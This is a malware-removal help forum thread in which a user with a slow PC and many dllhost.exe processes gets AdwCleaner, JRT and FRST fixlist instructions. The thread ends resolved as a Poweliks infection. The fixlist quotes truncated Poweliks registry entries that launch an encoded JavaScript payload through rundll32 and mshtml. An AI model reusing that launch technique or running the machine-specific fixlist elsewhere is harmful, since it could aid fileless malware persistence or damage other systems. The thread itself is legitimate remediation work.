Midiax

dllhost.exe *32 - COM surrogate

Recommended Posts

ESET is constantly blocking an attempt to access multiple "Blacklist " locations....

In the "Services" list I have a large number of "dllhost.exe *32 - COM Surrogate" listings

My computer is slow - CPU Usage way high, etc.

 

Help

Share this post


Link to post
Share on other sites

Download AdwCleaner and save it on your desktop.

  • Close all open programs and Internet browsers (you may want to print our or write down these instructions first).
  • Double click on adwcleaner.exe to run the tool.
  • Click on the Scan button.
  • After the scan has finished, click on the Clean button.
  • Confirm each time with OK.
  • You will be prompted to restart your computer. A text file will open in Notepad after the restart (this is the log of what was removed), which you can save on your desktop.
  • Attach that log file to your reply by clicking the More Reply Options button to the lower-right of where you type in your reply.
  • If you lose that log file for any reason, you can find it at C:\AdwCleaner on your computer.
Download Junkware Removal Tool and save it on your desktop.
  • Shut down your anti-virus, anti-spyware, and firewall software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista or Windows 7, right-click it and select Run as administrator.
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log is saved to your desktop and will automatically open.
  • Attach the JRT log file to a reply by clicking the More Reply Options button to the lower-right of where you type in your reply.
Copy the below code to Notepad; Save As fixlist.txt to your Desktop.
HKU\S-1-5-21-3967662648-389259202-2558628863-1000\...\MountPoints2: {e9fb452f-e957-11e0-8738-806e6f6e6963} - D:\EIProcessCaller.exe
HKU\S-1-5-21-3967662648-389259202-2558628863-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
C:\Users\Public\eset_smart_security_live_installer.exe
C:\Users\Bill\AppData\Local\Temp\install_reader11_en_gtbd_chrd_dn_aaa_aih.exe
C:\Users\Bill\AppData\Local\Temp\ose00000.exe
C:\Users\Bill\AppData\Local\Temp\Quarantine.exe
C:\Users\Bill\AppData\Local\Temp\_is84AE.exe
C:\Users\Bill\AppData\Local\Temp\_isC8AB.exe
CustomCLSID: HKU\S-1-5-21-3967662648-389259202-2558628863-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
AlternateDataStreams: C:\Users\Bill\Documents\SB966.eml:OECustomProperty
Close Notepad.

NOTE: It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST64 and press the Fix button just once and wait.

If the tool needed a restart please make sure you let the system to restart normally and let the tool complete its run after restart.

The tool will make a log on the Desktop (Fixlog.txt). Please attach it to your reply.

Note: If the tool warns you about an outdated version please download and run the updated version.

Share this post


Link to post
Share on other sites

It appears the documented resolution resolved this virus.  It appears it was a variation of Poweliks. I was wondering if anyone knows how the virus gets dumped on your PC??? Does come from email, websites, hacking with IP bots, etc.????

I would really like to know how this crap propagates itself around the world.

Share this post


Link to post
Share on other sites

Thread Closed

Reason: Resolved

The procedures contained in this thread are for this user and this user only. Attempting to use the instructions in this thread on your system could result in damaging the Operating System beyond repair. Do Not use any of the tools mentioned in this thread without the supervision of a Malware Removal Specialist.

All posters requesting Malware Removal assistance are required to follow all procedures in the thread titled START HERE, if you don't we are just going to send you back to this thread.

Share this post


Link to post
Share on other sites
Guest
This topic is now closed to further replies.

  • Recently Browsing   0 members

    No registered users viewing this page.